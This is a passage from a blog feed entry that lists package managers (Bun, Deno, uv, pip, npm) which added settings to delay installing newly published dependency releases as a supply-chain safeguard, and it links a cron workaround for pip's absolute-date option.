&lt;li&gt;&lt;a href="https://bun.com/blog/bun-v1.3#minimum-release-age"&gt;Bun 1.3&lt;/a&gt; (October 2025) — &lt;code&gt;minimumReleaseAge&lt;/code&gt; via &lt;code&gt;bunfig.toml&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://deno.com/blog/v2.6#controlling-dependency-stability"&gt;Deno 2.6&lt;/a&gt; (December 2025) — &lt;code&gt;--minimum-dependency-age&lt;/code&gt; for &lt;code&gt;deno update&lt;/code&gt; and &lt;code&gt;deno outdated&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/astral-sh/uv/releases/tag/0.9.17"&gt;uv 0.9.17&lt;/a&gt; (December 2025) — added relative duration support to existing &lt;code&gt;--exclude-newer&lt;/code&gt;, plus per-package overrides via &lt;code&gt;exclude-newer-package&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ichard26.github.io/blog/2026/01/whats-new-in-pip-26.0/"&gt;pip 26.0&lt;/a&gt; (January 2026) — &lt;code&gt;--uploaded-prior-to&lt;/code&gt; (absolute timestamps only; &lt;a href="https://github.com/pypa/pip/issues/13674"&gt;relative duration support requested&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration"&gt;npm 11.10.0&lt;/a&gt; (February 2026) — &lt;code&gt;min-release-age&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;pip&lt;/code&gt; currently only supports absolute rather than relative dates but Seth Larson &lt;a href="https://sethmlarson.dev/pip-relative-dependency-cooling-with-crontab"&gt;has a workaround for that&lt;/a&gt; using a scheduled cron to update the absolute date in the &lt;code&gt;pip.conf&lt;/code&gt; config file.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pip"&gt;pip&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/deno"&gt;deno&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;&lt;/p&gt;

</summary><category term="javascript"/><category term="packaging"/><category term="pip"/><category term="pypi"/><category term="python"/><category term="security"/><category term="npm"/><category term="deno"/><category term="supply-chain"/><category term="uv"/></entry></feed>